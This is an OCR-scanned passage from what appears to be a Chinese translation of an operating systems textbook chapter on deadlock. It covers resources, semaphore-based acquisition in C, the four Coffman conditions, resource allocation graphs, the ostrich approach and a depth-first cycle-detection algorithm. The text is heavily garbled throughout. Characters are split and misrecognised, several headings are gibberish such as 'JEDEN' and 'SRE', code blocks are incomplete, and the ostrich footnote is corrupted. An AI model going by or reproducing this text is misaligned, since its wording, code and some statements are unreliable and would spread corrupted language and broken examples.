同时 让 两 个 进程 打印 将 造成 混乱 的 打印 结果 ; 两 个 进程 同时 使 用 同一 文 
件 系统 表 中 的 表 项 会 引起 文件 系统 的 瘫痪 。 正 因为 如 此 ， 操 作 系 统 部 具 
有 授权 一 个 进程 (临时 〉 排 他 地 访问 某 一 种 资源 的 能 


在 很 多 应 用 中 ， 需 要 一 个 进程 排他 性 地 访问 大 干 种 资源 而 不 是 一 
种 。 例 如 ， 有 两 个 进程 准备 分 别 将 扫描 的 文档 记录 到 CD 上 。 进 程 A 请 求 
使 用 扫描 仪 ， 并 被 授权 使 用 。 但 进程 B 首 先 请 求 CD 刻录 机 ， 也 被 授权 使 
用 。 现 在 ，A 请 求 使 用 CD 刻录 机 ， 但 该 请 求 在 B 释 放 CD 刻 录 机 前 会 被 拒 
绝 。 但 是 ， 进 程 B 非 但 不 放弃 CD 刻录 机 ， 而 且 去 请 求 扫描 仪 。 这 时 ， 两 
个 进程 都 被 阻塞 ， 并 且 一 直 处 于 这 样 的 状态 。 这 种 状况 就 是 死 锁 
(deadlock) 。 


和 死 锁 也 可 能 发 生 在 机 器 之 间 。 例 如 ， 许 多 办 公 室 中 都 用 计算 机 连 成 
局 域 网 ， 扫 描 仪 、CD 刻 录 机 、 打 印 机 和 磁带 机 等 设备 也 连接 到 局 域 网 
上 上 ， 成 为 共 至 资源 ， 供 局 域 网 中 任何 机 器 上 的 人 和 用 户 使 用 。 如 果 这 些 
设备 可 以 远程 保留 给 某 一 个 用 户 《“ 比 如 ， 在 用 户 家 里 的 机 器 使 用 这 些 设 
备 ) ， 那 么 ， 也 会 发 生 上 面 描述 的 死 锁 现 象 。 更 复杂 的 情形 会 引起 三 
个 、 四 个 或 更 多 设备 和 用 户 发 生死 锁 。 








除了 请 求 独占 性 的 IO 设备 之 外 ， 别 的 情况 也 有 可 能 引起 死 锁 。 例 
如 ， 在 一 个 数据 库 系 统 中 ， 为 了 避免 竞争 ， 可 对 奋 干 记录 加 锁 。 如 果 进 
程 A 对 记录 R1 加 了 锁 ， 进 程 B 对 记录 R2 加 了 锁 ， 接 着 ， 这 两 个 进程 又 试 
图 各 自 把 对 方 的 记录 也 加 锁 ， 这 时 也 会 产生 死 锁 。 所 以 ， 软 硬件 资源 都 
有 可 能 出 现 死 锁 。 








在 本 章 里 ， 我 们 准备 考察 几 类 死 锁 ， 了 解 它们 是 如 何 出 现 的 ， 学 习 
防止 或 者 避免 死 锁 的 办 法 。 尽 管 我 们 所 讨论 的 是 操作 系统 环境 下 出 现 的 
死 锁 问题 ， 但 是 在 数据 库 系 统 和 许多 计算 机 应 用 环境 中 都 可 能 产生 死 
锁 ， 所 以 我 们 所 介绍 的 内 容 实际 上 可 以 应 用 到 包含 多 个 进程 的 系统 中 。 
有 很 多 有 关 死 锁 的 著作 ，《Operating Systems Review》 中 列 出 了 两 本 参 
考 书 (Newton,1979;Zobel,1983) ， 有 兴趣 的 读者 可 以 参考 这 两 本 书 。 
死 锁 方 面 的 大 多 数 研 究 工 作 在 1980 年 以 前 就 完成 了 ， 尽 管 所 列 的 参考 文 
献 有 些 老 ， 但 是 这 些 内容 依 然 是 很 有 用 的 。 





6.1 资源 





大 部 分 死 锁 都 和 资源 相关 ， 所 以 我 们 首先 来 看 看 资源 是 什么 。 在 进 
程 对 设备 、 文 件 等 取得 了 排他 性 访问 权时 ， 有 可 能 会 出 现 死 锁 。 为 了 尽 
可 能 使 天 于 死 锁 的 讨论 通用 ， 我 们 把 这 类 需要 排他 性 使 用 的 对 象 称 为 资 
Vi Cresource) 。 资 源 可 以 是 便 件 设备 《如 磁带 机 ) 或 是 一 组 信息 《如 
数据 库 中 一 个 加 锁 的 记录 〉。 通 常 在 计算 机 中 有 多 种 (可 获取 的 〉 资 
源 。 一 些 类 型 的 资源 会 有 若干 个 相同 的 实例 ， 如 三 台 磁 带 机 。 当 茶 一 资 
源 有 奋 干 实例 时 ， 其 中 任何 一 个 都 可 以 用 来 满足 对 资源 的 请 求 。 简 单 来 
说 ， 资 源 就 是 随 着 时 间 的 推移 ， 必 须 能 获得 、 使 用 以 及 释放 的 任何 东 
西 。 








6.1.1 可 抢占 资源 和 不 可 抢占 资源 


资源 分 为 两 类 : 可 抢占 的 和 不 可 抢占 的 。 可 抢占 资源 “preemptable 
resource) 可 以 从 拥有 它 的 进程 中 抢占 而 不 会 产生 任何 副作用 ， 存 储 器 
就 是 一 类 可 抢占 的 资源 。 例 如 ， 一 个 系统 拥有 256MB 的 用 户 内 存 和 一 台 
打印 机 。 如 果 有 两 个 256MB 内 存 的 进程 都 想 进 行 打 印 ， 进 程 A 请 求 并 获 
得 了 打印 机 ， 然 后 开始 计算 要 打印 的 值 。 在 它 没 有 完成 计算 任务 之 前 ， 
它 的 时 间 片 就 已 经 用 完 并 被 换 出 。 





然后 ， 进 程 B 开 始 运 行 并 请 求 打印 机 ， 但 是 没有 成 功 。 这 时 有 潜在 
的 死 锁 危 险 。 由 于 进程 A 拥有 打印 机 ， 而 进程 B 占 有 了 内 存 ， 两 个 进程 
都 缺少 男 外 一 个 进程 拥有 的 资源 ， 所 以 任何 一 个 都 不 能 继续 执行 。 不 
过 ， 和 对 和 运 的 是 通过 把 进程 B 换 出 内 存 、 把 进程 A 换 入 内 存 束 可 以 实现 抢 
占 进程 B 的 内 存 。 这 样 ， 进 程 A 继 续 运 行 并 执行 打印 任务 ， 然 后 释放 打 
印 机 。 在 这 个 过 程 中 不 会 产生 死 锁 。 





相反 ， 不 可 抢占 资源 (nonpreemptable resource) 是 指 在 不 引起 相关 
的 计算 失败 的 情况 下 ， 无 法 把 它 从 占有 它 的 进程 处 抢占 过 来 。 如 果 一 个 
进程 已 开始 刻 盘 ， 突 然 将 CD 刻录 机 分 配给 另 一 个 进程 ， 那 么 将 划 坏 CD 
盘 。 在 任何 时 刻 CD 刻录 机 都 是 不 可 抢占 的 。 








忆 的 来 说 ， 死 锁 和 不 可 抢占 资源 有 关 ， 有 关 可 抢占 资源 的 潜在 死 锁 
通常 可 以 通过 在 进程 之 间 重 新 分 配 资源 而 化 解 。 所 以 ， 我 们 的 重点 放 在 
不 可 抢占 资源 上 。 


使 用 一 个 资源 所 需要 的 事件 顺序 可 以 用 抽象 的 形式 表示 如 下 : 
1) 请 求 资源 。 
2) 使 用 资源 。 
3) 释 放 资 源 。 


奉 请 求 时 资源 不 可 用 ， 则 请 求 进程 被 迫 等 每 。 在 一 些 操作 系统 中 ， 


资源 请 求 失 败 时 进程 会 自动 被 阻 暑 ， 在 资源 可 用 时 再 唤醒 它 。 在 其 他 的 
系统 中 ， 资 源 请 求 失 败 会 返回 一 个 错误 代码 ， 请 求 的 进程 会 等 待 一段 时 
间 ， 然 后 重 试 。 








当 一 个 进程 请 求 资源 失败 时 ， 它 通常 会 处 于 这 样 一 个 小 循环 中 请 
求 资源 ， 休 虐 ， 再 请 求 。 这 个 进程 虽然 没有 被 阻 窒 ， 但 是 从 各 角度 来 
说 ， 它 不 能 做 任何 有 价值 的 工作 ， 实 际 和 阻塞 状态 一 样 。 在 后 面 的 讨论 
中 ， 我 们 假设 : 如 果 菏 个 进程 请 求 资源 失败 ， 那 么 它 吕 进入 休眠 状态 。 





请 求 资源 的 过 程 是 非常 依赖 于 系统 的 。 在 某 些 系统 中 ， 提 供 了 
request 系 统 调用 ， 用 于 允许 进程 资源 请 求 。 在 为 一 些 系统 中 ， 操 作 系 统 
只 知道 资源 是 一 些 特殊 文件 ， 在 任何 时 刻 它 们 最 多 只 能 被 一 个 进程 打 
开 。 一 般 情况 下 ， 这 些 特 殊 文 件 用 open 调 用 打开 。 如 采 这 些 文件 正在 被 
使 用 ， 那 么 ， 发 出 open 调 用 的 进程 会 被 阻 瞪 ， 一 直到 文件 的 当前 使 用 者 

关闭 该 文件 为 止 。 





6.1.2 ”资源 获取 


对 于 数据 库 系 统 中 的 记录 这 类 资源 ， 应 该 由 用 户 进程 来 管理 其 使 
用 。 一 种 允许 用 户 管 理 资源 的 可 能 方法 是 为 每 一 个 资源 配置 一 个 信和 号 
量 。 这 些 信 号 量 都 被 初始 化 为 1。 互 斥 信号 量 也 能 起 到 相同 的 作用 。 上 
述 的 三 个 步骤 可 以 实现 为 信号 量 的 down 操 作 来 获取 资源 ， 使 用 资源 ， 
最 后 使 用 up 操作 来 释放 资源 。 这 三 个 步骤 如 图 6-1a 所 示 。 


typedef int semaphore; 
semaphore resource _ 1; 


void process_A(void) { 
down(&resource _ 1); 
use_resource_1( ); 
up(&resource _ 1); 


typedef int semaphore; 
semaphore resource _ 1; 
semaphore resource _ 2; 


void process_A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 
up(&resource _ 1); 


b) 





图 6-1 使 用 信号 量 保护 资源 : a—DRR; 了 bb) 两 个 资源 


有 时 候 ， 进 程 需要 两 个 或 更 多 的 资源 ， 它 们 可 以 顺序 获得 ， 如 图 6- 
1b 所 示 。 如 采 需 要 两 个 以 上 的 资源 ， 通 常 都 是 连续 获取 。 


到 目前 为 止 ， 进 程 的 执行 不 会 出 现 问题 。 在 只 有 一 个 进程 参与 时 ， 
所 有 的 工作 都 可 以 很 好 地 完成 。 当 然 ， 如 果 只 有 一 个 进程 ， 就 没有 必要 
这 么 慎重 地 获取 资源 ， 因 为 不 存在 资源 竞争 。 


现在 考虑 两 个 进程 AMB) 以 及 两 个 资源 的 情况 。 图 6-2 描 述 了 两 
种 不 同 的 方式 。 在 图 6-2a 中 ， 两 个 进程 以 相同 的 次 友 请 求 资源 ， 在 图 6- 
2b 中 ， 它 们 以 不 同 的 次 序 请 求 资源 。 这 种 不 同 看 似 微不足道 ， 实 则 不 
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在 图 6-2a 中 ， 其 中 一 个 进程 先 于 为 一 个 进程 获取 资源 。 这 个 进程 能 
够 成 功 地 获取 第 二 个 资源 并 完成 它 的 任务 。 如 果 男 一 个 进程 想 在 第 一 个 
资源 被 释放 之 前 获取 该 资源 ， 那 么 它 会 由 于 资源 加 锁 而 被 阻 赛 ， 直 到 该 
资源 可 用 为 止 。 





图 6-2b 的 情况 就 不 同 了 。 可 能 其 中 一 个 进程 获取 了 两 个 资源 并 有 效 
地 阻 星 了 男 外 一 个 进程 ， 直 到 它 使 用 完 这 两 个 资源 为 止 。 但 是 ， 也 有 可 
能 进程 A 获取 了 资源 1， 进 程 B 获 取 了 资源 2， 每 个 进程 如 果 都 想 请 求 男 
一 个 资源 就 会 被 阻 竖 ， 那 么 ， 每 个 进程 者 无 法 继续 运行 。 这 种 情况 就 是 
死 锁 。 


typedef int semaphore; 
semaphore resource _ 1; 
semaphore resource _ 2; 


void process_A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 


up(&resource _ 1); 


} 


void process_B(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 
up(&resource _ 1); 


a) 





semaphore resource _ 1; 
semaphore resource _ 2; 


void process_A(void) { 
down(&resource _ 1); 
down(&resource _ 2); 
use_both_resources( ); 
up(&resource _ 2); 
up(&resource _ 1); 


} 


void process_B(void) { 
down(&resource _ 2); 
down(&resource _ 1); 
use_both_resources( ); 
up(&resource _ 1); 
up(&resource _ 2); 


b) 


图 6-2 让 无 死 锁 的 编码 ; b) 有 可 能 出 现 死 锁 的 编码 


这 里 我 们 可 以 看 到 一 个 编码 风格 上 的 细微 送别 〈 哪 一 个 资源 先 获 
FQ) 造成 了 可 以 执行 的 程序 和 不 能 执行 而 且 无 法 检测 错误 的 程序 之 间 的 
差别 。 因 为 死 锁 是 非常 容易 发 生 的 ， 所 以 有 很 多 人 研究 如 何 处 理 这 种 情 
况 。 这 一 章 就 会 详细 讨论 死 锁 问 题 ， 并 给 出 一 些 对 俩 。 





6.2” 死 锁 概 述 


死 锁 的 规范 定义 如 下 : 


如 果 一 个 进程 集合 中 的 每 个 进程 都 在 等 待 只 能 由 该 进程 集合 中 的 其 
他 进程 才能 引发 的 事件 ， 那 么 ， 该 进程 集合 就 是 死 锁 的 。 


a 


由 于 所 有 的 进程 都 在 等 待 ， 所 以 没有 一 个 进程 能 引发 可 以 唤醒 该 进 
程 集合 中 的 其 他 进程 的 事件 ， 这 样 ， 所 有 的 进程 都 只 好 无 限期 等 竺 下 
去 。 在 这 一 模型 中 ， 我 们 假设 进程 只 含有 一 个 线程 ， 并 且 被 阻 豆 的 进程 
无 法 由 中 断 唤 醒 。 无 中 断 条 件 使 死 锁 的 进程 不 能 被 时 钟 中 断 等 唤醒 ， 从 
而 不 能 引发 释放 该 集合 中 的 其 他 进程 的 事件 。 











在 大 多 数 情况 下 ， 每 个 进程 所 等 待 的 事件 是 释放 该 进程 集合 中 其 他 
进程 所 占有 的 资源 。 换 言 之 ， 这 个 死 锁 进 程 集合 中 的 每 一 个 进程 都 在 等 
待 另 一 个 死 锁 的 进程 已 经 占有 的 资源 。 但 是 由 于 所 有 进程 都 不 能 运行 ， 
它们 中 的 任何 一 个 都 无 法 释放 资源 ， 所 以 没有 一 个 进程 可 以 被 唤醒 。 进 
程 的 数量 以 及 占有 或 者 请 求 的 资源 数量 和 种 类 都 是 无 关 紧要 的 ， 而 且 无 
论 资源 是 何 种 类 型 (软件 或 者 硬件 ) 都 会 发 生 这 种 结果 。 这 种 死 锁 称 为 
资源 死 锁 (resource deadlock) 。 这 是 最 常见 的 类 型 ， 但 并 不 是 惟一 的 
类 型 。 本 节 我 们 会 详细 介绍 一 下 资源 死 锁 ， 在 本 章 末 再 概述 其 他 类 型 的 
死 锁 。 








6.2.1 资源 死 锁 的 条 件 


Coffman 等 人 1971) ZH SRA CAM) SEAVER DEAE: 





1) 互 斥 条 件 。 每 个 资源 要 么 已 经 分 配给 了 一 个 进程 ， 要 么 就 是 可 用 
的 。 





2) 占 有 和 等 竺 条件。 已 经 得 到 了 茶 个 资源 的 进程 可 以 再 请 求 新 的 资 








3) 不 可 抢占 条 件 。 已 经 分 配给 一 个 进程 的 资源 不 能 强制 性 地 被 抢 
占 ， 它 只 能 被 占有 它 的 进程 显 式 地 释放 。 





4) 环 路 等 待 条 件 。 死 锁 发 生 时 ， 系 统 中 一 定 有 由 两 个 或 两 个 以 上 的 
进程 组 成 的 一 条 环 路 ， 该 环 路 中 的 每 个 进程 都 在 等 待 着 下 一 个 进程 所 占 
有 的 资源 。 


死 锁 发 生 时 ， 以 上 四 个 条 件 一 定 是 同时 满足 的 。 如 果 其 中 任何 一 个 
条 件 不 成 立 ， 死 锁 就 不 会 发 生 。 














值得 注意 的 是 ， 每 一 个 条 件 都 与 系统 的 一 种 可 选 策略 相关 。 一 种 资 
源 能 人 否 同时 分 配给 不 同 的 进程 ? 一 个 进程 能 个 在 占有 一 个 资源 的 同时 请 
求 为 一 个 资源 ?资源 能 舍 被 抢占 ? 循环 等 待 环 路 是 否 存在 ? 我 们 在 后 面 
会 看 到 怎样 通过 破坏 上 述 条 件 来 预防 死 锁 。 


6.2.2 JEDEN 


Holt (1972) 指出 如 何 用 有 向 图 建立 上 述 四 个 条 件 的 模型 。 在 有 问 
图 中 有 两 类 节点 : 用 圆 形 表示 的 进程 ， 用 方形 表示 的 资源 。 从 资源 节点 
到 进程 布点 的 有 问 边 代表 该 资源 已 被 请 求 、 授 权 并 被 进程 占用 。 在 图 6- 
3a 中 ， 当 前 资源 R 正 被 进程 A 占 用 。 








由 进程 节点 到 资源 节点 的 有 向 边 表明 当前 进程 正在 请 求 该 资源 ， 并 
且 该 进程 已 被 阻塞 ， 处 于 等 待 该 资源 的 状态 。 在 图 6-3b 中 ， 进 程 B 正 等 
待 厦 资 源 S。 图 6-3c 说 明 进 入 了 和 死 锁 状 态 : 进程 C 等 竺 着 资源 IT， 资源 T 
被 进程 D 占 用 着 ， 进 程 D 又 等 待 着 由 进程 C 占 用 着 的 资源 U。 这 样 两 个 进 
程 都 得 等 待 下 去 。 图 中 的 环 表示 与 这 些 进程 和 资源 有 关 的 死 锁 。 在 本 例 
中 ， 环 是 C-T-D-U-C。 





w ©) 





图 6-3 资源 分 配 图 : 四 占有 一 个 资源 ; b) 请 求 一 个 资源 ; 9 死 锁 


我 们 再 看 看 使 用 资源 分 配 图 的 方法 。 假 设 有 三 个 进程 (A, B, C) 
及 三 个 资源 〈R，S，T) 。 三 个 进程 对 资源 的 请 求 和 释放 如 图 6-4a 一 图 
6-4c 所 示 。 操 作 系 统 可 以 随时 选择 任 一 非 阻 塞 进程 运行 ， 所 以 它 可 选择 

A 运行 一 直到 A 完成 其 所 有 工作 ， 接 着 运行 B， 最 后 运行 C。 
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3. A 请 求 S 
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图 6-4 一 个 死 锁 是 如 何 产 生 以 及 如 何 避 免 的 例子 





上 述 的 执行 次 序 不 会 引起 死 锁 《因为 没有 资源 的 竞争 ) ， 但 程序 也 
没有 任何 并 行 性 。 进 程 在 执行 过 程 中 ， 不 仅 要 请 求 和 释放 资源 ， 还 要 做 
计算 或 者 输入 /输出 工作 。 如 果 进 程 是 串 行 运行 ， 不 会 出 现 当 一 个 进程 
等 等 LO 时 让 为 一 个 进程 占用 CPU 进 行 计算 的 情形 。 因 此 ， 严 格 的 串 行 
操作 有 可 能 不 是 最 优 的 。 不 过 ， 如 果 所 有 的 进程 都 不 执行 IO 操作 ， 那 
么 最 短 作 业 优 先 调度 会 比 轮转 调度 优越 ， 所 以 在 这 种 情况 下 ， 串 行 运行 
有 可 能 是 最 优 的 。 











如 果 假 设 进程 操作 包含 WO 和 计算 ， 那 么 轮转 法 是 一 种 合适 的 调度 
算法 。 对 资源 请 求 的 次 序 可 能 会 如 图 6-4d 所 示 。 假 如 按 这 个 次 序 执行 ， 
图 6-4e 一 图 6-4j 是 相应 的 资源 分 配 图 。 在 出 现 请 求 4 后 ， 如 图 6-4h 所 示 ， 
进程 A 被 阻塞 等 待 5， 后 续 两 步 中 的 B 和 C 也 会 被 阻塞， 结果 如 图 6-4 所 
示 ， 产 生 环 路 并 导致 死 锁 。 


不 过 正如 前 面 所 讨论 的 ， 并 没有 规定 操作 系统 要 按照 某 一 特定 的 次 
序 来 运行 这 些 进程 。 特 别 地 ， 对 于 一 个 有 可 能 引起 死 锁 的 资源 请 求 ， 操 
作 系 统 可 以 干脆 不 批准 请 求 ， 并 把 该 进程 挂 起 〈 即 不 参与 调度 ) 一 直到 
处 于 安全 状态 为 止 。 在 图 6-4 中 ， 假 设 操作 系统 知道 有 引起 死 锁 的 可 
能 ， 那 么 它 可 以 不 把 资源 S 分 配给 B， 这 样 B 被 挂 起 。 假 如 只 运行 进程 A 
和 C， 那 么 资源 请 求 和 释放 的 过 程 会 如 图 6-4k 所 示 ， 而 不 是 如 图 6-4d 所 
示 。 这 一 过 程 的 资源 分 配 图 在 图 6-41 一 图 6-4q 中 给 出 ， 其 中 没有 死 锁 产 
生 。 








在 第 q 步 执行 完 后 ， 束 可 以 把 资源 S 分 配给 B 了 ， 因 为 A 已 经 完成 ， 
而 且 C 获 得 了 它 所 需要 的 所 有 资源 。 尽 管 B 会 因为 请 求 T 而 等 待 ， 但 是 不 


会 引起 死 锁 ，B 只 需要 等 待 C 结 束 。 








在 本 章 后 面 我 们 将 考察 一 个 具体 的 算法 ， 用 以 做 出 不 会 引起 死 锁 的 
资源 分 配 决 策 。 在 这 里 需要 说 明 的 是 ， 资 源 分 配 图 可 以 用 作 一 种 分 析 工 
具 ， 考 察 对 一 给 定 的 请 求 /释放 的 序列 是 人 否 会 引起 死 锁 。 只 需要 按照 请 
求 和 释放 的 次 序 一 步 步 进 行 ， 每 一 步 之 后 都 检查 图 中 是 否 包 括 了 环 路 。 
如 果 有 环 路 ， 那 么 就 有 和 死 锁 ; 反之 ， 则 没有 和 死 锁 。 在 我 们 的 例子 中 ， 虽 
然 只 和 同一 类 资源 有 关 ， 而 且 只 包含 一 个 实例 ， 但 是 上 面 的 原理 完全 可 
以 推广 到 有 多 种 资源 并 含有 者 干 个 实例 的 情况 中 去 CHolt,1972) 。 














总 而 言 之 ， 有 四 种 处 理 死 锁 的 策略 : 





1) 忽 略 该 问题 。 也 许 如 果 你 忽略 它 ， 它 也 会 忽略 你 。 


2) 检 测 死 锁 并 恢复 。 让 死 锁 发 生 ， 检 测 它们 是 否 发 生 ， 一 旦 发 生死 


锁 ， 采 取 行 动 解决 问题 。 





3) 仔 细 对 资源 进行 分 配 ， 动 态 地 避免 死 锁 。 
4) 通 过 破坏 引起 死 锁 的 四 个 必要 条 件 之 一 ， 防 止 死 锁 的 产生 。 


下 和 面 四 市 将 分 别 讨论 这 四 种 方法 。 


6.3 SRE 





Bef) AAR TT ESE BE: 把 头 埋 到 沙子 里 ， 假 装 根 本 没有 问 
题 发 生 口 。 每 个 人 对 该 方法 的 看 法 都 不 相同 。 数 学 家 认为 这 种 方法 根 
本 不 能 接受 ， 不 论 代价 有 多 大 ， 部 要 彻 抵 防止 死 锁 的 产生 ;工程师 们 想 
要 了 解 死 锁 太 生 的 频 度 、 系 统 因 各 种 原因 册 尝 的 发 生 次 数 以 及 死 锁 的 严 
重 性 。 如 宁 死 锁 平 均 每 5 年 发 生 一 次 ， 而 每 个 月 系统 都 会 因 人 硬件 故障 、 
编译 器 错误 或 者 操作 系统 故障 而 朋 尝 一 次 ， 那 么 大 多 数 的 工程 师 不 会 以 
性 能 损失 和 可 用 性 的 代价 去 防止 死 锁 。 


为 了 能 够 让 这 一 对 比 更 具体 ， 考 虑 如 下 情况 的 一 个 操作 系统 ， 当 一 
个 open 系 统 调用 因 物 理 设 备 〈( 例 如 CD-ROM 了 驱动 程序 或 者 打印 机 〉 忙 而 
不 能 得 到 响应 的 时 候 ， 操 作 系统 会 阻塞 调用 该 系统 调用 的 进程 。 通 常 是 
由 设备 驱动 来 决定 在 这 种 情况 下 应 该 采取 何 种 措施 。 显 然 ， 阻 塞 或 者 返 
回 一 个 错误 代码 是 两 种 选择 。 如 果 一 个 进程 成 功 地 打开 了 CD-ROM 驱 动 
器 ， 而 另 一 个 进程 成 功 地 打开 了 打印 机 ， 这 时 每 个 进程 都 会 试图 去 打开 
另外 一 个 设备 ， 然 后 系统 会 阻塞 这 种 党 试 ， 从 而 发 生死 锁 。 现 有 系统 很 
少 能 够 检测 到 这 种 死 锁 。 





[1] 这 一 民间 传说 毫 无 道理 。 舵 岛 每 小 时 跑 60 公 里 ， 为 了 得 到 一 顿 丰 盛 的 
晚餐 ， 它 一 脚 的 力量 足以 踢 死 一 头 狮子 。 


6.4 和 死 锁 检测 和 和 死 锁 恢复 


第 二 种 技术 是 死 锁 检 测 和 恢复 。 在 使 用 这 种 技术 时 ， 系 统 并 不 试图 
咀 止 死 锁 的 产生 ， 而 是 允许 死 锁 发 生 ， 当 检测 到 死 锁 发 生 后 ， 采 取 措 施 
进行 恢复 。 本 市 我 们 将 考察 检测 死 锁 的 几 种 方法 以 及 恢复 死 锁 的 几 种 方 
VE 


6.4.1 每 种 类 型 一 个 资源 的 死 锁 检 测 


我 们 从 最 简单 的 例子 开始 ， 即 每 种 类 型 只 有 一 个 资源 。 这 样 的 系统 
可 能 有 一 台 扫 描 仪 、 一 台 CD 刻 录 机 、 一 台 绘 图 仪 和 一 台 人 磁带 机 ， 但 每 
种 类 型 的 资源 都 不 超过 一 个 ， 即 排除 了 同时 有 两 台 打 印 机 的 情况 。 稍 后 
我 们 将 用 另 一 种 方法 来 解决 两 合 打印 机 的 情况 。 


可 以 对 这 样 的 系统 构造 一 张 资 源 分 配 图 ， 如 图 6-3 所 示 。 如 宁 这 张 
图 包含 了 一 个 或 一 个 以 上 的 环 ， 那 么 死 锁 就 存在 。 在 此 环 中 的 任何 一 个 
进程 都 是 死 锁 进程 。 如 果 没 有 这 样 的 环 ， 系 统 就 没有 发 生死 锁 。 


我 们 讨论 一 下 更 复杂 的 情况 ， 假 设 一 个 系统 包括 A 到 G 共 7 个 进程 ， 
R 人 到 W 共 6 种 资源 。 资 源 的 占有 情况 和 进程 对 资源 的 请 求情 况 如 下 : 


1)A 进 程 持 有 R 资 源 ， 且 需要 5S 资源。 


2)B 进 程 不 持 有 任何 资源 ， 但 需要 T 资 源 。 
3)C 进 程 不 持 有 任何 资源 ， 但 需要 S 资 源 。 
4)D 进 程 持 有 U 资 源 ， 且 需要 S 资 源 和 T 资 源 。 
5) 了 进程 持 有 TI 资源 ， 且 需要 V 资 源 。 

6)F 进 程 持 有 W 资 源 ， 且 需要 S 资 源 。 

7)G 进 程 持 有 V 资 源 ， 且 需要 U 资 源 。 


问题 是 : “系统 是 否 存在 死 锁 ?如 果 存 在 的 话 ， 死 锁 涉 及 了 哪些 进 


程 ? ” 


要 回答 这 一 问题 ， 我 们 可 以 构造 一 张 资源 分 配 图 ， 如 图 6-5a 所 示 。 
可 以 直接 观察 到 这 张 图 中 包含 了 一 个 环 ， 如 图 6-5b 所 示 。 在 这 个 环 中 ， 
我 们 可 以 看 出 进程 D、E、G 已 经 死 锁 。 进 程 A、C、EF 没 有 死 锁 ， 这 是 因 
为 可 把 S 资 源 分 配给 它们 中 的 任 一 个 ， 而 且 它 们 中 的 任 一 进程 完成 后 都 
能 释放 S， 于 是 其 他 两 个 进程 可 依次 执行 ， 直 至 执行 完毕 。 CER, 
为 了 让 这 个 例子 更 有 趣 ， 我 们 允许 进程 D 每 次 请 求 两 个 资源 。) 








图 6-5 纪 资 源 分 配 图 ; b) 从 a 中 抽取 的 环 





虽然 通过 观察 一 张 简单 的 图 就 能 够 很 容易 地 找 出 死 锁 进程 ， 但 为 了 
实用 ， 我 们 仍然 需要 一 个 正规 的 算法 来 检测 死 锁 。 众 所 周知 ， 有 很 多 检 
测 有 问 图 环 路 的 方法 。 下 面 将 给 出 一 个 简单 的 算法 ， 这 种 算法 对 有 癌 图 
进行 检测 ， 并 在 发 现 图 中 有 环 路 存在 或 无 环 路 时 结束 。 这 一 算法 使 用 了 
数据 结构 L， 工 代表 一 些 节 点 的 集合 。 在 这 一 算法 中 ， 对 已 经 检查 过 的 
WN CATAL) 进行 标记 ， 以 免 重 复 检查 。 





通过 执行 下 列 步 又 完成 上 述 算法 : 
1) 对 图 中 的 每 一 个 节点 N， 将 N 作 为 起 始点 执行 下 面 5 个 步 又 。 


2) 将 LL 初始 化 为 空 表 ， 并 清除 所 有 的 有 问 边 标 记 。 





3) 将 当前 节点 添加 到 L 的 尾部 ， 并 检测 该 节点 是 否 在 L 中 已 出 现 过 两 


次 。 如 果 是 ， 那 么 该 图 包含 了 一 个 坏 (已 列 在 L 中 ) ， 算 法 结束 。 





4) 从 给 定 的 节点 开始 ， 检 测 是 否 存 在 没有 标记 的 从 该 市 点 出 发 的 弧 
(有 问 边 )。 如 果 存 在 的 话 ， 做 第 5 步 ， 如 末 不 存在 ， 跳 到 第 6 步 。 


5) 随 机 选取 一 条 没有 标记 的 从 该 节点 出 发 的 弧 〈 有 疝 边 ) ， 标 记 
它 。 然 后 顺 看 这 条 弧 线 找到 新 的 当前 节 上 把， 返回 到 第 3 步 。 


6) 如 果 这 一 市 点 是 起 始 节 点 ， 那 么 表明 该 图 不 存在 任何 环 ， 算 法 结 
。 侍 则 意味 着 我 们 走 进 了 死胡同 ， 所 以 需要 移 走 该 节点 ， 返 回 到 前 一 
个 节操 ， 即 当前 市 上 前 面 的 一 个 节点 ， 并 将 它 作 为 新 的 当前 市 把 ， 同 时 


转 到 第 3 步 。 


这 一 算法 是 依次 将 每 一 个 节点 作为 一 棣 树 的 根 节 点 ， 并 进行 深度 优 
先 搜 索 。 如 果 再 次 碰 到 已 经 过 到 过 的 节点 ， 那 么 就 算 找到 了 一 个 环 。 如 
果 从 任何 给 定 的 节点 出 发 的 弧 都 被 穷 举 了 ， 那 么 束 回 漳 到 前 面 的 节点 。 
如 果 回 溯 到 根 并 且 不 能 再 深入 下 去 ， 那 么 从 当前 节点 出 发 的 子 图 中 就 不 
包含 任何 环 。 如 果 所 有 的 节点 都 是 如 此 ， 那 么 整个 图 就 不 存在 环 ， 也 惑 
是 说 系统 不 存在 死 锁 。 











为 了 验证 一 下 该 算法 是 如 何 工 作 的 ， 我 们 对 图 6-5a 运 用 该 算法 。 算 
法 对 市 点 次 序 的 要 求 是 任意 的 ， 所 以 可 以 选择 从 左 到 右 、 从 上 到 下 进行 
检测 ， 首 先 从 R 市 点 开始 运行 该 算法 ， 然 后 依次 从 A、B、C、S、 咏 、 
T、E、F 开 始 。 如 果 遇 到 了 一 个 环 ， 那 么 算法 停止。 


我 们 先 从 R 节 点 开始 ， 并 将 L 初 始 化 为 空 表 。 然 后 将 R 添 加 到 空 表 
中 ， 并 移动 到 惟一 可 能 的 节点 A， 将 它 添加 到 L 中 ， 变 成 L=[R，A]。 从 
A 我 们 到 达 S$， 并 使 L=[R，A，S]。S 没 有 出 发 的 弧 ， 所 以 它 是 条 死路 ， 
迫使 我 们 回溯 到 A。 既 然 A 没 有 任何 没有 标记 的 出 发 浙 ， 我 们 再 回 济 到 
R， 从 而 完成 了 以 R 为 起 始点 的 检测 。 





现在 我 们 重新 以 A 为 起 始点 局 动 该 算法 ， 并 重 置 L 为 空 表 。 这 次 检 
索 也 很 快 就 结束 了 ， 所 以 我 们 又 从 B 开 始 。 从 B 节 点 我 们 顺 着 弧 到 达 D， 
这 时 L= 也 ，T，E，V，G，U，D]。 现 在 我 们 必须 随机 选择 。 如 末 选 $ 
点 ， 那 么 走 进 了 死胡同 并 回溯 到 D。 接 着 选 T 并 将 更 新 为 [B，T，E， 
V，G，U，D， 了 如， 在 这 一 点 上 我 们 发 现 了 环 ， 算 法 结束 。 


这 种 算法 远 不 是 最 佳 算法 ， 较 好 的 一 种 算法 参见 〈Even,1979) 。 
但 坚 无 疑问 ， 该 实例 表明 确实 存在 检测 死 锁 的 算法 。 


